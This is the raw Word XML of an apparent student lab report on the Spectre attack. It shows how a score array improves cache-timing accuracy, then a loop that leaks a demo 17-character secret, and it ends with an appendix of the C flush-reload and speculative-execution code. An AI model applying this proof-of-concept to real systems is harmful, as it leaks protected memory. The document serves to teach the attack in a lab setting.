          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E159524" wp14:editId="2C4C1FE9">
            <wp:extent cx="5939790" cy="1624965"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
            <wp:docPr id="23" name="Picture 23" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%209.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0-18%20at%209.07.3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1624965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF448C" w14:textId="6DD7130F" w:rsidR="00B67293" w:rsidRDefault="00B67293">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1, we compile and run the improved program, and we see 0 is th</w:t>
      </w:r>
      <w:r w:rsidR="00044EB6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e secret, but this is incorrect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4FCCBE" w14:textId="32AAA5B6" w:rsidR="00B67293" w:rsidRDefault="00883CF0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68B077EC" wp14:editId="32B70795">
            <wp:extent cx="5939790" cy="2100580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="25" name="Picture 25" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%209.2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0-18%20at%209.29.08%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2100580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE26129" w14:textId="40B628ED" w:rsidR="00246203" w:rsidRDefault="00246203">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot2, after we fixed the problem, the program can print correct secret value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA5F5F" w14:textId="77777777" w:rsidR="0027662B" w:rsidRDefault="0027662B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A41500" w14:textId="78D01454" w:rsidR="00883CF0" w:rsidRDefault="00883CF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883CF0">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC691B1" w14:textId="7D3D049E" w:rsidR="00883CF0" w:rsidRDefault="0005229D" w:rsidP="0005229D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">In the previous task, we cannot get the correct secret all the time, there are a lot of </w:t>
      </w:r>
      <w:r w:rsidR="005E1AFA">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>noise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. So in this task, we add a score[] array to improve the accuracy. The mechanism is very simple. The score[] has size of 256, one entry for one secret value. When we get a secret value k, we increment score[k] by 1. For every address of secret, we run multiple times (i.e. 1000). Then the value k with highest score in the array </w:t>
      </w:r>
      <w:r w:rsidR="00A95CBC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">is the secret. </w:t>
      </w:r>
      <w:r w:rsidR="007770FF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>However, there is a problem;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidR="00073B91">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1 shows, when we run the program, we get 0 as our secret, obviously this answer is incorrect. So we examine the code and find the problem. When CPU perform the out-of-order execution, it will predict branch taken, so the secret in the buffer will be return. However, after the CPU find the prediction is incorrect, it will discard the branch execution, and it will run the code in branch not taken, which means it will run return 0 in the else clause. Therefore, even we get the secret, 0 will be return</w:t>
      </w:r>
      <w:r w:rsidR="00CF40E0">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ed as well. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>In short, whatever the secret returns or not, 0 will return</w:t>
      </w:r>
      <w:r w:rsidR="005E1AFA">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> finally</w:t>
      </w:r>
      <w:r w:rsidR="00073B91">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. As a result, the score[0] will have the highest value. So we make following change (marked by red):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BE2D3E"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static int scores[256];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA7BB7"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void reloadSideChannelImproved()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8ED4E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13448A4D"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int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A71F5"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volatile uint8_t *addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F729082"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register uint64_t time1, time2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E902A"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int junk = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D52EF"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for (i = 0; i &lt; 256; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB34CBB"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addr = &amp;array[i * 4096 + DELTA];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593545C"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time1 = __rdtscp(&amp;junk);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101830A1"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junk = *addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0E56D9" w14:textId="77777777" w:rsid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time2 = __rdtscp(&amp;junk) - time1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B110F10" w14:textId="462920E2" w:rsidR="0043276E" w:rsidRPr="00073B91" w:rsidRDefault="0043276E" w:rsidP="00073B91">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 xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="0043276E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">not include i=0 in our </w:t>
      </w:r>
      <w:r w:rsidR="005E1AFA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40268BD0"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if (time2 &lt;= CACHE_HIT_THRESHOLD </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE26B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&amp;&amp; i != 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00073B91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CE8142"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scores[i]++; /* if cache hit, add 1 for this value */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A417A86" w14:textId="7777777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 xml:space="preserve">  } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136FBFC8" w14:textId="0D062D57" w:rsidR="00073B91" w:rsidRPr="00073B91" w:rsidRDefault="00073B91" w:rsidP="00073B91">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073B91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D271C" w14:textId="4208B032" w:rsidR="00073B91" w:rsidRDefault="00073B91">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">we should not include i=0 in our result. So we just add </w:t>
      </w:r>
      <w:r w:rsidRPr="004E5360">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004E5360" w:rsidRPr="004E5360">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="004E5360">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>i != 0”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the if statement. So we only update scores[i], if i is not 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167233A4" w14:textId="06FBD8D4" w:rsidR="00073B91" w:rsidRDefault="00073B91">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>After the change, we run the program again. As screenshot2 shows, this time, we get a correct secret value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF4B21" w14:textId="77777777" w:rsidR="005E1AFA" w:rsidRDefault="005E1AFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217B9CDC" w14:textId="77777777" w:rsidR="002B78E0" w:rsidRDefault="002B78E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216C9661" w14:textId="78593F29" w:rsidR="00F81B00" w:rsidRPr="00F81B00" w:rsidRDefault="00F81B00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81B00">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task6: Steal the Entire Secret String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513EC33" w14:textId="6D4FB589" w:rsidR="00F81B00" w:rsidRDefault="00C33D1E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8E4008" wp14:editId="7B61ADA6">
            <wp:extent cx="5939790" cy="3975100"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="6" name="Picture 6" descr="../../../../Desktop/Screen%20Shot%202018-10-22%20at%2012.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2%20at%2012.48.2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975100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="407331DC" w14:textId="606D4153" w:rsidR="0055354B" w:rsidRDefault="0055354B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1, after modified the program, we compile and run the program again. This time, the whole secret value is printed</w:t>
      </w:r>
      <w:r w:rsidR="005E1AFA">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is “Some Secret Value”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717A144" w14:textId="77777777" w:rsidR="0055354B" w:rsidRDefault="0055354B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A031AC0" w14:textId="29E135F1" w:rsidR="0055354B" w:rsidRPr="0055354B" w:rsidRDefault="0055354B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0055354B">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64263C39" w14:textId="0771B090" w:rsidR="0055354B" w:rsidRDefault="0055354B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>In this task, we need to modify the program in task5, and then the program should print the whole secret value.</w:t>
      </w:r>
      <w:r w:rsidR="006620D4">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> We make following changes (marked by red):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3A8D2" w14:textId="0129497F"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int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11905CE7"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int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48D0DF"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uint8_t s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0681FBBE"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size_t larger_x = (size_t)(secret-(char*)buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A35DBF" w14:textId="40B295D5"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w:t>
      </w:r>
      <w:r w:rsidRPr="006620D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>for(int a=0; a&lt;17; a++){</w:t>
      </w:r>
      <w:r w:rsidR="005377A1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//run 17 time for 17 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D504B4A"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flushSideChannel();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C654D18"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for(i=0;i&lt;256; i++) scores[i]=0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B6B43" w14:textId="77777777" w:rsid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for (i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAAD4B8" w14:textId="103E796A" w:rsidR="005377A1" w:rsidRPr="006620D4" w:rsidRDefault="005377A1" w:rsidP="006620D4">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 xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="005377A1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ncrease the address value to get the secret char in current address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E9F24" w14:textId="0B8C47CA" w:rsidR="006620D4" w:rsidRPr="006620D4" w:rsidRDefault="006620D4" w:rsidP="006620D4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006620D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="006620D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>spectreAttack(larger_x+a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BEB98"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reloadSideChannelImproved();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59CC94"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A49F7"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int max = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC480D7"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for (i = 0; i &lt; 256; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F9876"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if(scores[max] &lt; scores[i])  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8D755"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max = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC9CA72"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746846D6" w14:textId="25F428E8"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printf("Reading secret value at %p = ", </w:t>
      </w:r>
      <w:r w:rsidRPr="00C33D1E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(void*)larger_x</w:t>
      </w:r>
      <w:r w:rsidR="00C33D1E" w:rsidRPr="00C33D1E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+a</w:t>
      </w:r>
      <w:r w:rsidRPr="006620D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F726E43"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printf("The  secret value is %d %c\n", max, max);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCD72F"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printf("The number of hits is %d\n", scores[max]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D7ED8E" w14:textId="77777777" w:rsidR="006620D4" w:rsidRPr="006620D4" w:rsidRDefault="006620D4" w:rsidP="006620D4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006620D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C1455D" w14:textId="77777777"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 xml:space="preserve">  return (0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A620DA" w14:textId="2C8EE664" w:rsidR="006620D4" w:rsidRPr="006620D4" w:rsidRDefault="006620D4" w:rsidP="006620D4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006620D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8F18C" w14:textId="3EB36793" w:rsidR="00F81B00" w:rsidRDefault="006620D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>because there are 17 character</w:t>
      </w:r>
      <w:r w:rsidR="00F116FD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the secret string, and we already have the address (call it X) of the first secret char. So the address </w:t>
      </w:r>
      <w:r w:rsidR="00F116FD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> next char is X+1, and so on. We add a for loop to let the program run 17 times for these </w:t>
      </w:r>
      <w:r w:rsidR="005377A1">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="0047007B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>; and in each loop,</w:t>
      </w:r>
      <w:r w:rsidR="00982066">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we repeat the same process to get the secret in the current address</w:t>
      </w:r>
      <w:r w:rsidR="008265BC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. As the screenshot1 shows, the whole secret is printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA1DEC" w14:textId="77777777" w:rsidR="00A763CE" w:rsidRDefault="00A763CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03994773" w14:textId="77777777" w:rsidR="00831B5C" w:rsidRDefault="00831B5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A56C079" w14:textId="77777777" w:rsidR="00831B5C" w:rsidRDefault="00831B5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D22B68D" w14:textId="77777777" w:rsidR="00831B5C" w:rsidRDefault="00831B5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C21BD6" w14:textId="77777777" w:rsidR="00831B5C" w:rsidRDefault="00831B5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25BAAAB2" w14:textId="77777777" w:rsidR="00A763CE" w:rsidRDefault="00A763CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05333ED7" w14:textId="12F1E06B" w:rsidR="00A763CE" w:rsidRPr="00A763CE" w:rsidRDefault="00A763CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A763CE">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Appendix (code for task6):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B103F7" w14:textId="77777777" w:rsidR="00A763CE" w:rsidRDefault="00A763CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646EF679"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#include &lt;emmintrin.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF2601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#include &lt;x86intrin.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D2DEB"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#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B768D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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243EAD9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#include &lt;stdint.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13975D3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30E0DB02"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unsigned int buffer_size = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3E9A2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uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9}; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC3CAF"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uint8_t temp = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0C4B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char *secret = "Some Secret Value";   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A8653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uint8_t array[256*4096];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FF80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551AE07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#define CACHE_HIT_THRESHOLD (97)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0322DAE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#define DELTA 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B33977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3545C29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Sandbox Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047D57B"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uint8_t restrictedAccess(size_t x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED59E5B"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1428FEA0"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if (x &lt; buffer_size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCF37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return buffer[x];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D46CE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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A61AF02"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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0083AD3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56988DB0"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35808510"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1E7D79E0"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void flushSideChannel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB94FA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3631AC3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int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA94939"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Write to array to bring it to RAM to prevent Copy-on-write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AD7D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 array[i*4096 + DELTA] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE8100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//flush the values of the array from cache</w:t>
      </w:r>
    </w:p>
